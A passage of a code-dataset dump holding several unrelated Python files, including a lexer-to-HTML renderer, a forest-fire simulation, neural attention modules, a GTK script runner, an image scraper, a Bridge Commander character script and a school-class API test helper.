bold_token = keywords\n    # NOTE: the original HTML tag literals appear to have been stripped from\n    # this file during extraction; the <pre>/<span> strings below are a\n    # plausible reconstruction, not the original markup.\n    code_out = \"<pre style='background-color: \" + meta_bgcolor + \"'>\\n\"
\n    cur=1\n    prev=1\n    for tok in lexer:\n        line = tok.lineno\n        if prev != line :\n            cur=1\n            code_out += \"\\n\"*(line-prev)\n            prev=line\n        col = find_column(code, tok)\n        bold = bold_token.get(tok.value, \"\")\n        if bold != \"\":\n            bold = \"; font-weight: bold\"\n            keyword_def= color_dict.get(\"KEYWORDS\", \"rgb(170,170,170)\")\n            color = color_dict.get(str(tok.type), keyword_def)\n        else:\n            color = color_dict.get(str(tok.type), \"rgb(170,170,170)\")\n        \n        span = \"<span style='color: \" + color + bold + \"'>\"\n        code_out = code_out + \" \"*(col-cur) + span + tok.value + \"</span>\"\n        cur=col + len(str(tok.value))\n    code_out = code_out + \"\\n</pre>
\"\n\n with open(output_file, \"w\") as f:\n f.write(code_out)\n","sub_path":"milestone4(final_project)/src/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"624921373","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pylab as pyl\nimport matplotlib.animation as animation\nimport random\n\nempty = 0\ntree = 1\nburning = 2\n\n# probability that a tree is immune from burning by a tree or lightning\nprobImmune = 0.25\n\n# probability that the tree adjacent will burn \nburnProbability = 0.1\n\n# probability of lightning hitting a site\nprobLightning = 0.0000001\n\n# probability that a tree is burning initially.\nprobBurning = 0.0005\n\n# probability that a site is initially occupied by tree\nprobTree = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n\nclass Cell:\n def __init__(self, x, y, p,state=tree):\n self.x = x\n self.y = y\n if random.uniform(0,1) < probTree[p]:\n if random.uniform(0,1) < probBurning:\n \n self.state = burning\n else:\n \n self.state = tree\n else:\n self.state = empty\n\n \n def setState(self, N, E, S, W):\n \"\"\"\n set the state of the site at time t+1\n input :\n\n N, E, S, W = states of the four neighbouring cells\n output :\n\n state of the site at time t+1\n\n \"\"\"\n \n \n if (self.state == burning):\n \n self.state = empty \n \n\n if self.state == empty:\n self.state = empty\n\n if self.state == tree:\n if N == burning or S == burning or E == burning or W == burning:\n if random.uniform(0,1) < probImmune:\n self.state = tree\n else:\n self.state = burning\n\n elif random.uniform(0,1) < probLightning*(1-probImmune):\n \n self.state = burning\n else:\n self.state = self.state\n \n return \n\n\nn = 50\nT = 50\nbar = []\n\nfor i in range(n):\n for j in range(n):\n bar.append(Cell(i,j,0))\nbar = np.reshape(np.array(bar), [n,n])\n\n\n\nall_states = np.zeros([T,n,n])\n\nfor t in range(T):\n for i in range(n):\n for j in range(n):\n all_states[t][i][j] = bar[i][j].state\n \nsims = 5\nprobs = np.array([[0 for x in range(sims)] for y in range(len(probTree))])\n\nfor p in range(len(probTree)): \n n = 50\n T = 50\n\n for s in range(sims):\n # rebuild the grid and recount initial coverage for every run; in the\n # original both sat outside this loop, so later runs started from the\n # previous run's burnt-out grid and the 'initial' count accumulated\n bar = []\n for i in range(n):\n for j in range(n):\n bar.append(Cell(i,j, p))\n bar = np.reshape(np.array(bar), [n,n])\n\n init_forest_cov = 0\n for i in range(1,n-1):\n for j in range(1,n-1): \n if bar[i][j].state != empty:\n init_forest_cov = init_forest_cov + 1\n print(init_forest_cov,'initial')\n\n all_states = np.zeros([T,n,n])\n print(np.shape(all_states))\n for t in range(T):\n for i in range(n):\n for j in range(n):\n all_states[t][i][j] = bar[i][j].state\n\n\n forest_cov = 0\n\n for t in range(1,T):\n\n count=0\n for i in range(1,n-1):\n for j in range(1,n-1): \n bar[i][j].setState(bar[i-1][j].state, bar[i][j+1].state, bar[i+1][j].state, bar[i][j-1].state)\n all_states[t][i][j] = bar[i][j].state\n\n # periodic boundary condition\n\n for i in range(n):\n bar[i][n-1].state = bar[i][1].state\n bar[i][0].state = bar[i][n-2].state\n all_states[t][i][n-1] = bar[i][n-1].state\n all_states[t][i][0] = bar[i][0].state\n\n for j in range(n):\n bar[0][j].state = bar[n-2][j].state\n bar[n-1][j].state = bar[1][j].state\n all_states[t][0][j] = bar[0][j].state\n all_states[t][n-1][j] = bar[n-1][j].state\n\n\n \n print(forest_cov,'before loop')\n for i in range(1,n-1):\n for j in range(1,n-1): \n if bar[i][j].state != 
empty:\n forest_cov = forest_cov + 1\n\n print(forest_cov, probTree[p])\n probs[p][s] = forest_cov\n\n\n\nmeans = np.zeros(len(probs))\nfor i in range(len(means)):\n means[i] = probs[i].mean()\n\nplt.plot(probTree,means/((n-1)*(n-1)), 'b-o')\n\nplt.xlabel('Initial density of trees')\nplt.ylabel('Final density of trees')\n#plt.xticks(ticks=np.arange(0,9),labels=probs)\nplt.savefig('neigh_burn_graph.eps')\nplt.show() \n\n","sub_path":"Lab-10/periodic_graphs.py","file_name":"periodic_graphs.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"231828489","text":"import sys\nimport qm\nimport atexit\nimport gc\nimport qm.cuda\nimport pylab\n\natexit.register(qm.cuda_thread_exit)\n\nN = 2048\ndt = 1.0/4096.0\nf_min = 40.0\n\nm1 = m2 = 1.4\namp = qm.sp_amplitude(None,m1,m2,f_min,qm.schwarzschild_isco(m1+m2),N,dt,None)\namp_gpu = qm.cuda.cuda_sp_amplitude(None,m1,m2,f_min,qm.schwarzschild_isco(m1+m2),N,dt,None)\n\namp_gpu_local=qm.cplx_vec_t_from_gpu(amp_gpu);\n\ndiffre=amp.get_real()-amp_gpu_local.get_real();\n\npylab.subplot(211)\npylab.plot(diffre)\nax=pylab.gca()\nax.yaxis.major.formatter.set_powerlimits((0,0))\npylab.ylabel('sp_amplitude on CPU vs GPU Absolute Error')\n\npylab.subplot(212)\npylab.plot(amp.get_real())\npylab.plot(amp_gpu_local.get_real());\nax=pylab.gca()\nax.yaxis.major.formatter.set_powerlimits((0,0))\npylab.ylabel('sp_amplitude on CPU & GPU')\n\npylab.savefig('spa_amp_compare.png')\n\n\n\n\n","sub_path":"test/cuda/cuda_sp_amp_test.py","file_name":"cuda_sp_amp_test.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"516844309","text":"def rev(s):\n return s[::-1]\n \ndef pal(s):\n r = rev(s)\n \n if s==r:\n return True\n return False\n \ns= \"dad\"\nans= pal(s)\n\nif ans==1:\n print(\"palindrome\")\n \nelse:\n print(\"not palindrome\")\n\n","sub_path":"stringpallindrom.py","file_name":"stringpallindrom.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"288476369","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math  # needed by Attention_Bahdanau below; missing in the original\n\n# Default: Luong Attention\nclass Attention(nn.Module):\n def __init__(self, dim):\n super(Attention, self).__init__()\n self.linear_out = nn.Linear(dim*2, dim)\n self.mask = None\n\n def set_mask(self, mask):\n self.mask = mask\n\n def forward(self, output, context):\n batch_size = output.size(0)\n hidden_size = output.size(2)\n input_size = context.size(1)\n # (batch, out_len, dim) * (batch, in_len, dim) -> (batch, out_len, in_len)\n attn = torch.bmm(output, context.transpose(1, 2))\n if self.mask is not None:\n attn.data.masked_fill_(self.mask, -float('inf'))\n attn = F.softmax(attn.view(-1, input_size), dim=1).view(batch_size, -1, input_size)\n\n # (batch, out_len, in_len) * (batch, in_len, dim) -> (batch, out_len, dim)\n mix = torch.bmm(attn, context)\n\n # concat -> (batch, out_len, 2*dim)\n combined = torch.cat((mix, output), dim=2)\n # output -> (batch, out_len, dim); torch.tanh, since F.tanh is deprecated\n output = torch.tanh(self.linear_out(combined.view(-1, 2 * hidden_size))).view(batch_size, -1, hidden_size)\n\n return output, attn\n\n# Bahdanau Attention\nclass Attention_Bahdanau(nn.Module):\n def __init__(self, dim):\n super(Attention_Bahdanau, self).__init__()\n self.linear_out = nn.Linear(dim*2, dim)\n self.v = nn.Parameter(torch.rand(dim))\n stdv = 1. 
/ math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n\n def forward(self, hidden, encoder_outputs, src_len=None):\n # hidden.shape = layer * batch_size * hidden_size\n # encoder_outputs = batch_size * in_len * hidden_size\n max_len = encoder_outputs.size(1)\n batch_size = encoder_outputs.size(0)\n # H = batch_size * in_len * hidden_size\n H = hidden.repeat(max_len,1,1).transpose(0,1)\n attn_energies = self.score(H, encoder_outputs)\n\n if src_len is not None:\n mask = []\n for b in range(src_len.size(0)):\n mask.append([0] * src_len[b].item() + [1] * (encoder_outputs.size(1) - src_len[b].item()))\n mask = cuda_(torch.ByteTensor(mask).unsqueeze(1)) # [B,1,T]\n attn_energies = attn_energies.masked_fill(mask, -1e18)\n\n return F.softmax(attn_energies.view(-1, max_len), dim=1).view(batch_size, 1, -1)\n\n def score(self, hidden, encoder_outputs):\n # (batch, out_len, 2*hidden) -> (batch, out_len, hidden)\n # energy = batch_size * in_len * hidden_size\n energy = torch.tanh(self.linear_out(torch.cat([hidden, encoder_outputs], 2)))\n energy = energy.transpose(2,1) # [B*H*T]\n v = self.v.repeat(encoder_outputs.data.shape[0],1).unsqueeze(1) #[B*1*H]\n energy = torch.bmm(v,energy) # [B*1*T]\n return energy\n","sub_path":"Seq2seq/models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"459749224","text":"APPNAME = \"Third Hand\"\nVERSION = \"v1.0\"\n\nimport os\nimport sys\nimport multiprocessing\nimport time\nimport gtk\n\nsys.path.append(os.path.dirname(os.path.realpath(sys.argv[0])) + \"/scripts/\")\n\n\nclass ScriptHandler:\n def __init__(self):\n self.running = True\n self.scripts = []\n scripts_dict = self.import_scripts(os.path.dirname(os.path.realpath(sys.argv[0])) + \"/scripts/\")\n for d in scripts_dict:\n self.scripts.append(Script(d))\n self.threads = []\n self.start_threads()\n\n def get_scripts_menu_items(self):\n ret = []\n if len(self.scripts) > 0:\n for sc in self.scripts:\n i = gtk.CheckMenuItem(sc.name)\n i.set_active(self.is_running(sc))\n ret.append(i)\n else:\n i = gtk.MenuItem(\"No scripts\")\n i.set_sensitive(False)\n ret.append(i)\n return ret\n\n def is_running(self, script):\n for t in self.threads:\n if t.script.name == script.name:\n return True\n return False\n\n def import_scripts(self, dir):\n library_list = []\n for f in os.listdir(dir):\n module_name, ext = os.path.splitext(f) # Handles no-extension files, etc.\n if ext == '.py': # Important, ignore .pyc/other files.\n module = __import__(module_name)\n library_list.append(module)\n return library_list\n\n def start_threads(self):\n for sc in self.scripts:\n if sc.startup is True:\n t = ScriptThread(sc)\n t.start()\n self.threads.append(t)\n\n def kill_threads(self):\n for t in self.threads:\n t.stop()\n\n def activate(self, n):\n for sc in self.scripts:\n if sc.name == n:\n t = ScriptThread(sc)\n t.start()\n self.threads.append(t)\n\n def desactivate(self, n):\n for t in self.threads:\n if t.script.name == n:\n t.stop()\n t.p.terminate()\n self.threads.remove(t)\n\n\nclass Script:\n def __init__(self, module):\n self.module = module\n self.name = module.name\n self.timer = module.timer\n self.startup = module.startup\n\n def begin(self):\n self.module.begin()\n\n def do(self):\n self.module.do()\n\n def end(self):\n self.module.end()\n\n\nclass ScriptThread:\n def __init__(self, script):\n self.p = multiprocessing.Process(target=self.run)\n self.script = script\n 
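 # NOTE: this flag lives in the parent process; after start() the run()
 # loop executes in a separate child process, so stop() alone cannot end
 # it -- ScriptHandler.desactivate() therefore also calls p.terminate()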
self.running = True\n\n def start(self):\n self.p.start()\n\n def run(self):\n self.script.begin()\n while self.running:\n self.script.do()\n time.sleep(self.script.timer * 0.001)\n\n def stop(self):\n self.script.end()\n self.running = False\n\n\ndef make_menu(event_button, event_time, data=None):\n menu = gtk.Menu()\n for i in script_handler.get_scripts_menu_items():\n i.connect(\"activate\", on_script_click)\n menu.append(i)\n i.show()\n sep = gtk.SeparatorMenuItem()\n menu.append(sep)\n sep.show()\n close_item = gtk.MenuItem(\"Quit\")\n close_item.connect_object(\"activate\", close_app, \"Close App\")\n menu.append(close_item)\n close_item.show()\n menu.popup(None, None, None, event_button, event_time)\n\ndef on_script_click(widget):\n if widget.active is False:\n script_handler.desactivate(widget.get_label())\n else:\n script_handler.activate(widget.get_label())\n\ndef on_right_click(data, event_button, event_time):\n make_menu(event_button, event_time)\n\ndef close_app(data=None):\n script_handler.kill_threads()\n gtk.main_quit()\n\n\nif __name__ == '__main__':\n script_handler = ScriptHandler()\n icon = gtk.status_icon_new_from_stock(gtk.STOCK_EXECUTE)\n icon.connect('popup-menu', on_right_click)\n icon.set_has_tooltip(True)\n icon.set_tooltip_text(APPNAME + \" | \" + VERSION)\n gtk.main()","sub_path":"thirdhand.py","file_name":"thirdhand.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"93291580","text":"from urllib import request\nimport threading\nfrom time import sleep,ctime\nfrom html import parser\n\ndef down_img( filepath,FileName =\"default.jpg\" ):\n try:\n imgpage = request.urlopen( filepath)\n print(\"Accessing remote file \"+filepath+\"\\n\")\n img = imgpage.read()\n print(\"Saving file \"+FileName+\"\\n\")\n try:\n File = open(FileName,\"wb\" )\n File.write(img)\n File.close()\n return\n except IOError:\n print(\"error\\n\")\n return\n except Exception:\n print(\"error\\n\")\n return\n\ndef down_img_thread( filepathlist ):\n print(\"%d files to download in total\"%len(filepathlist))\n for file in filepathlist:\n print( file )\n print(\"Starting multithreaded download\")\n down_threads=[] # holds the worker threads\n count=1\n for file in filepathlist:\n t = threading.Thread( target=down_img,args=(file,\"%d.jpg\"%count) )\n count = count + 1\n down_threads.append(t)\n for down in down_threads:\n down.start()\n for down in down_threads:\n down.join() # wait for all threads to finish\n print(\"All threads finished\")\n\nclass parserLinks( parser.HTMLParser):\n filelist=[]\n def handle_starttag(self,tag,attrs):\n if tag == 'img':\n for name,value in attrs:\n if name == 'src':\n print( value)\n self.filelist.append(value)\n #print( self.get_starttag_text() )\n def get_file_list(self):\n return self.filelist\n\n\ndef main(WebUrl):\n if __name__ == \"__main__\":\n lparser = parserLinks()\n imgpage = request.urlopen( WebUrl )\n for context in imgpage.readlines():\n _str=\"%s\"%context\n try:\n lparser.feed( _str)\n except Exception: # html.parser.HTMLParseError was removed in Python 3.5\n pass\n imgpage.close()\n imagelist= lparser.get_file_list()\n down_img_thread( imagelist) \nWebUrl=\"https://cn.bing.com/images/search?q=%e7%be%8e%e5%a5%b3%e7%bd%91&qpvt=%e7%be%8e%e5%a5%b3%e7%bd%91\"\nmain(WebUrl)\n","sub_path":"Img_download/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"534352881","text":"###############################################################################\n#\tFilename:\tSaffi.py\n#\t\n#\tConfidential and 
Proprietary, Copyright 2000 by Totally Games\n#\t\n#\tLoads Saffi Larsen, XO, and configures animations.\n#\t\n#\tCreated:\t3/28/00 -\tErik Novales\n###############################################################################\n\nimport App\nimport CharacterPaths\n\n#NonSerializedObjects = ( \"debug\", )\n\n#debug = App.CPyDebug(__name__).Print\n\n###############################################################################\n#\tCreateCharacter()\n#\n#\tCreate Saffi by building her character and placing her on the passed in set.\n#\tCreate her menus as well.\n#\n#\tArgs:\tpSet\t- the Set in which to place ourselves\n#\n#\tReturn:\tnone\n###############################################################################\ndef CreateCharacter(pSet):\n#\tdebug(\"Creating Saffi\")\n\n\tif (pSet.GetObject(\"XO\") != None):\n\t\treturn(App.CharacterClass_Cast(pSet.GetObject(\"XO\")))\n\tCharacterPaths.UpdatePaths()\n\t# Create the character\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", \"Bip01\")\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", None)\n\tppromSaffi = App.CharacterClass_Create(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", CharacterPaths.g_pcHeadNIFPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", 1)\n\tppromSaffi.ReplaceBodyAndHead(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_body.tga\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\n\tppromSaffi.SetCharacterName(\"Saffi\")\n\n\t# Add the character to the set\n\tpSet.AddObjectToSet(ppromSaffi, \"XO\")\n\tpLight = pSet.GetLight(\"ambientlight1\")\n\tpLight.AddIlluminatedObject(ppromSaffi)\n\n\t# Setup the character configuration\n\tppromSaffi.SetSize(App.CharacterClass.MEDIUM)\n\tppromSaffi.SetGender(App.CharacterClass.FEMALE)\n\tppromSaffi.SetRandomAnimationChance(.75)\n\tppromSaffi.SetBlinkChance(0.1)\n\tppromSaffi.SetDatabase(\"data/TGL/Bridge Crew General.tgl\")\n\n\t# Load Saffi's general dialogue lines.\n\tLoadSounds()\n\n\tppromSaffi.AddFacialImage(\"Blink0\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"Blink1\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"Blink2\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.SetBlinkStages(3)\n\n\tppromSaffi.AddFacialImage(\"SpeakA\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"SpeakE\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"SpeakU\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.SetAnimatedSpeaking(1)\n\n\tpMenusDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Menus.tgl\")\n\tpTop = App.TopWindow_GetTopWindow()\n\tpTacticalControlWindow = App.TacticalControlWindow_GetTacticalControlWindow()\n\tppromSaffi.SetMenu(pTacticalControlWindow.FindMenu(pMenusDatabase.GetString(\"Commander\")))\n\tApp.g_kLocalizationManager.Unload(pMenusDatabase)\n\n#\tdebug(\"Finished creating Saffi\")\n\treturn ppromSaffi\n\n\n###############################################################################\n#\tConfigureForShip()\n#\n#\tConfigure ourselves for the particular ship object. 
This involves setting\n#\tup range watchers that tell us how to report.\n#\n#\tArgs:\tpSet\t- the Set object\n#\t\t\tpShip\t- the player's ship (ShipClass object)\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForShip(pSet, pShip):\n\t# Get our character object\n\tppromSaffi = App.CharacterClass_Cast(pSet.GetObject(\"XO\"))\n\tif (ppromSaffi == None):\n#\t\tdebug(\"******* Commanding officer not found *********\")\n\t\treturn\n\n#\tdebug(\"Attaching menu to XO..\")\n\timport Bridge.XOCharacterHandlers\n\tBridge.XOCharacterHandlers.AttachMenuToXO(ppromSaffi)\n\n\t#\n\t# This is where code to set up responses based on the ships state\n\t# e.g. \"Main power back on line\"\n\t#\n\n###############################################################################\n#\tConfigureForprometheus()\n#\n#\tConfigure ourselves for the prometheus bridge\n#\n#\tArgs:\tppromSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForprometheus(ppromSaffi):\n#\tdebug(\"Configuring Saffi for the prometheus bridge\")\n\n\t# Clear out any old animations from another configuration\n\tppromSaffi.ClearAnimations()\n\n\t# Register animation mappings\n\tppromSaffi.AddAnimation(\"SeatedpromCommander\", \"Bridge.Characters.promMediumAnimations.promPlaceAtC\")\n\tppromSaffi.AddAnimation(\"StandingpromCommander\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tppromSaffi.AddAnimation(\"EBL1MToEBCommander\", \"Bridge.Characters.promMediumAnimations.EBMoveFromL1ToC\")\n\tppromSaffi.AddAnimation(\"EBCommanderToL1\", \"Bridge.Characters.promMediumAnimations.EBMoveFromCToL1\")\n\tppromSaffi.AddAnimation(\"EBCommanderToC1\", \"Bridge.Characters.promMediumAnimations.EBMoveFromCToC1\")\n\tppromSaffi.AddAnimation(\"EBCommander1ToC\", \"Bridge.Characters.promMediumAnimations.EBMoveFromC1ToC\")\n\tppromSaffi.AddAnimation(\"promCommanderTurnCaptain\", \"Bridge.Characters.promMediumAnimations.promTurnAtCTowardsCaptain\")\n\tppromSaffi.AddAnimation(\"promCommanderBackCaptain\", \"Bridge.Characters.promMediumAnimations.promTurnBackAtCFromCaptain\")\n\n\tppromSaffi.AddAnimation(\"promCommanderGlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tppromSaffi.AddAnimation(\"promCommanderGlanceAwayCaptain\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"promCommander1GlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tppromSaffi.AddAnimation(\"promCommander1GlanceAwayCaptain\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\n\tppromSaffi.AddAnimation(\"EBCommanderTurnE\", \"Bridge.Characters.promMediumAnimations.EBCTalkE\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackE\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"EBCommanderTurnH\", \"Bridge.Characters.promMediumAnimations.EBCTalkH\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackH\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"EBCommanderTurnT\", \"Bridge.Characters.promMediumAnimations.EBCTalkT\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackT\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"EBCommanderTurnS\", \"Bridge.Characters.promMediumAnimations.EBCTalkS\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackS\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\n\tppromSaffi.AddAnimation(\"EBCommanderTurprom\", 
\"Bridge.Characters.promMediumAnimations.EBCTalkE\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackX\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\n\t# Breathing\n\tppromSaffi.AddAnimation(\"promCommanderBreathe\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"promCommander1Breathe\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tppromSaffi.AddAnimation(\"promCommanderBreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\tppromSaffi.AddAnimation(\"promCommander1BreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\n\t# Interaction\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.promMediumAnimations.promCConsoleInteraction\", App.CharacterClass.SITTING_ONLY, 25, 1)\n\tppromSaffi.AddAnimation(\"PushingButtons\", \"Bridge.Characters.promMediumAnimations.promCConsoleInteraction\")\n\n\t# Hit animations\n\tppromSaffi.AddAnimation(\"promCommanderHit\", \"Bridge.Characters.promMediumAnimations.promCHit\")\n\tppromSaffi.AddAnimation(\"promCommanderHitHard\", \"Bridge.Characters.promMediumAnimations.promCHitHard\")\n\t#ppromSaffi.AddAnimation(\"EBCommanderHitStanding\", \"Bridge.Characters.CommonAnimations.HitStanding\")\n\t#ppromSaffi.AddAnimation(\"EBCommanderHitHardStanding\", \"Bridge.Characters.CommonAnimations.HitHardStanding\")\n\tppromSaffi.AddAnimation(\"promCommanderReactLeft\", \"Bridge.Characters.CommonAnimations.ReactLeft\")\n\tppromSaffi.AddAnimation(\"promCommanderReactRight\", \"Bridge.Characters.CommonAnimations.ReactRight\")\n\n\t# Add common animations.\n\tAddCommonAnimations(ppromSaffi)\n\tppromSaffi.SetStanding(0)\n\tppromSaffi.SetLocation(\"promCommander\")\n\tppromSaffi.AddPositionZoom(\"promCommander\", 0.55)\n#\tdebug(\"Finished configuring Saffi\")\n\n###############################################################################\n#\tAddCommonAnimations()\n#\n#\tSince we can only clear out all animations when switching bridges (how\n#\twould we know which not to clear?), we can't really setup animations common\n#\tto all bridge configurations as we might like. 
Because of this we have a\n#\troutine to add common animations (most of which are randoms) that both\n#\tconfigurations will call\n#\n#\tArgs:\tppromSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef AddCommonAnimations(ppromSaffi):\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.promMediumAnimations.CLookAroundConsoleDown\", App.CharacterClass.SITTING_ONLY, 1, 1)\n\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadLeft\")\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadRight\")\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookLeft\", App.CharacterClass.SITTING_ONLY)\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookRight\", App.CharacterClass.SITTING_ONLY)\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookUp\", App.CharacterClass.SITTING_ONLY)\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookDown\", App.CharacterClass.SITTING_ONLY)\n\n###############################################################################\n#\tLoadSounds\n#\t\n#\tLoad any of Saffi's general or spontaneous sounds, so they don't\n#\thitch the game when they're played.\n#\t\n#\tArgs:\tNone\n#\t\n#\tReturn:\tNone\n###############################################################################\ndef LoadSounds():\n\tpGame = App.Game_GetCurrentGame()\n\tpDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Crew General.tgl\")\n\t\n\t#\n\t# Build a list of sound to load\n\t#\n\tlSoundList =\t[\n\t\t# Yes?\n\t\t\"gf001\",\n\t\t\"gf002\",\n\n\t\t# Report.\n\t\t\"gf020\",\n\n\t\t# Alert lines.\n\t\t\"GreenAlert\",\n\t\t\"GreenAlert2\",\n\t\t\"GreenAlert3\",\n\t\t\"YellowAlert\",\n\t\t\"YellowAlert3\",\n\t\t\"YellowAlert2\",\n\t\t\"RedAlert\",\n\t\t\"RedAlert2\",\n\n\t\t# Contacting starfleet.\n\t\t\"gl004\",\n\t\t\"gl005\",\n\t\t\t\t\t]\n\t#\n\t# Loop through that list, loading each sound in the \"BridgeGeneric\" group\n\t#\n\tfor sLine in lSoundList:\n\t\tpGame.LoadDatabaseSoundInGroup(pDatabase, sLine, \"BridgeGeneric\")\n\n\tApp.g_kLocalizationManager.Unload(pDatabase)\n","sub_path":"scripts/Bridge/Characters/promSaffi.py","file_name":"promSaffi.py","file_ext":"py","file_size_in_byte":10803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69834356","text":"from cv2 import cv2\nfrom diffCalculation import diff_functions\nimport time\n\n\ndef main():\n video_source = cv2.VideoCapture('test_video.avi')\n frame1 = None\n frame2 = None\n optical_flow_calculator = diff_functions.DiffOpticalFlow()\n while video_source.grab():\n frame2 = frame1\n flag, frame1 = video_source.retrieve()\n frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\n if frame1 is not None:\n cv2.imshow('video1', frame1)\n if frame2 is not None:\n cv2.imshow('video2', frame2)\n cv2.waitKey(1)\n\n if frame1 is not None and frame2 is not None:\n start_time = time.time()\n result = optical_flow_calculator.get_optical_flow(frame1, frame2, block_size=[16, 16])\n print(time.time() - start_time)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620122243","text":"# -*-coding:utf-8 -*-\nimport requests\nfrom cfg import g_vcode\n\nfrom pprint import pprint\nfrom robot.libraries.BuiltIn 
import BuiltIn\nfrom robot.api import logger\n\nclass SchoolClassLib:\n URL = \"http://ci.ytesting.com/api/3school/school_classes\"\n\n # List classes\n def list_school_class(self,gradeid=None):\n\n params = {\n 'vcode': g_vcode,\n 'action': 'list_classes_by_schoolgrade',\n }\n if gradeid != None:\n params['gradeid'] = int(gradeid)\n\n\n response = requests.get(self.URL, params=params)\n bodyDict=response.json()\n\n pprint(bodyDict,indent=2) # indent=2 sets the indentation width to two\n return bodyDict\n\n\n\n # Add a class\n # the idSaveName parameter saves the returned id\n def add_school_class(self,gradeid,name,studentlimit,idSaveName=None):\n payload = {\n 'vcode': g_vcode,\n 'action': 'add',\n 'grade': int(gradeid),\n 'name': name,\n 'studentlimit': int(studentlimit),\n }\n\n response=requests.post(self.URL,data=payload)\n bodyDict=response.json()\n pprint(bodyDict,indent=2)\n\n # # when idSaveName is given, fetch and save the returned id\n # if idSaveName:\n # BuiltIn().set_global_variable('${%s}'%idSaveName,bodyDict['id'])\n\n return bodyDict\n\n\n # Modify a class\n def modify_school_class(self,classid,newname,newstudentlimit):\n payload={\n 'vcode':g_vcode,\n 'action':'modify',\n 'name':newname,\n 'studentlimit':int(newstudentlimit)\n }\n\n 